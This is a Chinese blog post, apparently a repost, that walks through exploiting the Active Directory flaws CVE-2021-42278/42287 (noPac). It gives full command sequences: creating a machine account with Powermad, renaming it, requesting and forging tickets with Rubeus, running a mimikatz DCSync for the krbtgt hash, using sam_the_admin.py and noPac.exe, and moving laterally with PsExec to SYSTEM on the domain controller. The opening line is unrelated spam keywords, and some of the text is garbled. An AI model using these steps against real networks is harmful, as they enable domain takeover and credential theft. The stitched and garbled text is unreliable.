建立收费网站,一级a做爰网站中国,英文网站建设解决方案,买模板做的网站表单数据在哪里看倘见玉皇先跪奏#xff1a;他生永不落红尘
本文首发于先知社区#xff0c;原创作者即是本人
前言
网络安全技术学习#xff0c;承认⾃⼰的弱点不是丑事。只有对原理了然于⼼#xff0c;才能突破更多的限制。拥有快速学习能力的白帽子#xff0c;是不能有短板的#xf…倘见玉皇先跪奏他生永不落红尘
本文首发于先知社区原创作者即是本人
前言
网络安全技术学习承认⾃⼰的弱点不是丑事。只有对原理了然于⼼才能突破更多的限制。拥有快速学习能力的白帽子是不能有短板的有的只能是大量的标准板和几块长板。知识⾯决定看到的攻击⾯有多⼴知识链决定发动的杀伤链有多深。
一、漏洞原理
CVE-2021-42278机器账户的名字一般来说应该以$结尾但AD没有对域内机器账户名做验证。CVE-2021-42287与上述漏洞配合使用创建与DC机器账户名字相同的机器账户不以$结尾账户请求一个TGT后更名账户然后通过S4U2self申请TGS Ticket接着DC在TGS_REP阶段这个账户不存在的时候DC会使用自己的密钥加密TGS Ticket提供一个属于该账户的PAC然后我们就得到了一个高权限ST。假如域内有一台域控名为 DC域控对应的机器用户为 DC$此时攻击者利用漏洞 CVE-2021-42287 创建一个机器用户 SAMTHEADMIN-48$再把机器用户 SAMTHEADMIN-48$ 的 sAMAccountName 改成 DC。然后利用 DC 去申请一个TGT票据。再把 DC 的sAMAccountName 改为 SAMTHEADMIN-48$。这个时候 KDC 就会判断域内没有 DC 这个用户自动去搜索 DC$DC$是域内已经的域控DC 的 sAMAccountName攻击者利用刚刚申请的 TGT 进行 S4U2self模拟域内的域管去请求域控 DC 的 ST 票据最终获得域控制器DC的权限。
二、手工复现
1、操作流程
# 1. create a computer account
$password ConvertTo-SecureString ComputerPassword -AsPlainText -Force
New-MachineAccount -MachineAccount ControlledComputer -Password $($password) -Domain domain.local -DomainController DomainController.domain.local -Verbose# 2. clear its SPNs
Set-DomainObject CNControlledComputer,CNComputers,DCdomain,DClocal -Clear serviceprincipalname -Verbose# 3. rename the computer (computer - DC)
Set-MachineAccountAttribute -MachineAccount ControlledComputer -Value DomainController -Attribute samaccountname -Verbose# 4. obtain a TGT
Rubeus.exe asktgt /user:DomainController /password:ComputerPassword /domain:domain.local /dc:DomainController.domain.local /nowrap# 5. reset the computer name
Set-MachineAccountAttribute -MachineAccount ControlledComputer -Value ControlledComputer -Attribute samaccountname -Verbose# 6. obtain a service ticket with S4U2self by presenting the previous TGT
Rubeus.exe s4u /self /impersonateuser:DomainAdmin /altservice:ldap/DomainController.domain.local /dc:DomainController.domain.local /ptt /ticket:[Base64 TGT]# 7. DCSync
(mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt2、拥有一个普通域账户
net user xxx /domain3、尝试攻击
3.1、利用 powermad.ps1 新增机器帐号域用户默认可以新建机器账户
命令
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount TestSPN -Domain xx.xx -DomainController xx.xx.xx -Verbose3.2、clear its SPNs清除SPN信息
Import-Module .\powerview.ps1
Set-DomainObject CNTestSPN,CNComputers,DCxxx,DCxxx -Clear serviceprincipalname -Verbose3.3、reset the computer name重设机器名称
Set-MachineAccountAttribute -MachineAccount TestSPN -Value xxx -Attribute samaccountname -Verbose3.4、Request TGT 请求TGT
.\Rubeus.exe asktgt /user:xxx /password:xxxx /domain:xxx.xxx /dc:xx.xx.xx /nowrap3.5、Change Machine Account samaccountname改回原来属性
Set-MachineAccountAttribute -MachineAccount TestSPN -Value TestSPN -Attribute samaccountname -Verbose3.6、Request S4U2self获取票据
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:x.x.x /self /altservice:LDAP/x.x.x. /ptt /ticket:doIE5jCCBOKgAwIBBaEDAgEWooID/zCCA/t3.7、获取 kbrtgt 用户的 NTLM Hash
lsadump::dcsync /user:x\krbtgt /domain:x.x /dc:x.x.x三、sam-the-admin复现
前置条件
需要一个域用户
利用过程
拿主域控
python3 sam_the_admin.py x.x/x:x -dc-ip x.x.x.x -shell漏洞利用 漏洞证明 拿子域控
python3 sam_the_admin.py x.x.x/x:x -dc-ip x.x.x.x -shell漏洞利用 漏洞证明 问题
低版本的kali可能会面临可以拿到票据但是无法列出命令执行的窗口
四、impacket工具包复现 五、CVE-2021-42287/CVE-2021-42278 工具利用
1、下载地址
github
2、实际操作
2.1、扫描探测
.\noPac.exe scan -domain x.x.x -user x -pass x测试开始之前查看域控根目录提示拒绝访问
dir \x.x.x\c$ 2.2、直接利用(打子域是同样方法)
./noPac.exe -domain x.x -user x -pass x /dc x.x.x /mAccount x /mPassword x /service cifs /ptt此时已可以查看域控根目录
ls \x.x.x\c$ 注意问题
如果使用cifs协议的话票据时效比较短 如果使用ldap协议的话票据时效比较长
2.3、深度利用
使用PsExec横向移动
通过noPac.exe使用cifs协议后可以继续通过PsExec64.exe直接横向移动到域控主机或者域内其他机器
PsExec64.exe \\x.x.x.x -u x\x -i -p x -s cmd.exe利用过程 直接提升到system权限查看IP确实为域控IP 网络安全感悟
做网络安全是一个长期的过程因为做网络安全没有终点不管是网络安全企业还是在网络安全行业各种不同方向的从业人员不管你选择哪个方向只有在这条路上坚持不懈才能在这条路上走的更远走的更好不然你肯定走不远迟早会转行或者被淘汰把时间全浪费掉。如果你觉得自己是真的热爱网络安全这个行业坚持走下去就可以了不用去管别人现在就是一个大浪淘金的时代淘下去的是沙子留下来的才是金子正所谓千淘万漉虽辛苦吹尽狂沙始到金网络安全的路还很长一生只做一件事坚持做好一件事
文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。
免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。
转载声明各家兴 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。
CSDN:
https://blog.csdn.net/weixin_48899364?typeblog公众号
https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirect博客:
https://rdyx0.github.io/先知社区
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
